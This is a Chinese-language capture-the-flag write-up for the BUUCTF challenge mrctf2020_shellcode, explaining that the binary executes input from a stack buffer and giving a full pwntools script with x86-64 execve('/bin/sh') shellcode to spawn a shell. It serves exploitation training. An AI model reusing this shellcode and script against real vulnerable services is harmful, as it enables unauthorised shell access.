BUUCTF--mrctf2020_shellcode1

这是一题64位的shellocde题,没啥花招入门题。看下保护:


有可执行的段。接着我们看看IDA:


主函数中无法反汇编,那么我们直接看汇编代码。其实很简单,通过系统调用执行puts函数,然后执行read函数。


正在我想如何覆盖返回地址的时候,发现题目直接帮你搞好了。取buf的的地址(栈上)然后跳转到buf位置执行代码。那么我们直接通过read函数构造shellcode就完成了:

python 复制代码
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
io=process('./mrctf2020_shellcode')

shellcode = '''
    mov rbx,0x68732f6e69622f
    push rbx
    push rsp
    pop rdi
    xor esi,esi
    xor edx,edx
    push 0x3b
    pop rax
    syscall
'''


shellcode=asm(shellcode)

io.recvuntil("magic!")

io.sendline(shellcode)

io.interactive()
相关推荐
科比不来it11 分钟前
Go语言数据竞争Data Race 问题怎么检测?怎么解决?
开发语言·c++·golang
biter down13 分钟前
c语言14:字符指针
c语言·开发语言
光军oi27 分钟前
JAVA全栈JVM篇————初识JVM
java·开发语言·jvm
给大佬递杯卡布奇诺35 分钟前
FFmpeg 基本API av_seek_frame函数内部调用流程分析
c++·ffmpeg·音视频
Moniane41 分钟前
C++深度解析:从核心特性到现代编程实践
java·开发语言·jvm
uxiang_blog42 分钟前
C++进阶:重载类型转换
linux·开发语言·c++
爱编程的鱼1 小时前
C# 参数详解:从基础传参到高级应用
开发语言·microsoft·c#
Michael_lcf1 小时前
Java的UDP通信:DatagramSocket和DatagramPacket
java·开发语言·udp
道之极万物灭1 小时前
Python操作word实战
开发语言·python·word
moringlightyn1 小时前
c++11可变模版参数 emplace接口 新的类功能 lambda 包装器
开发语言·c++·笔记·其他·c++11·lambda·包装器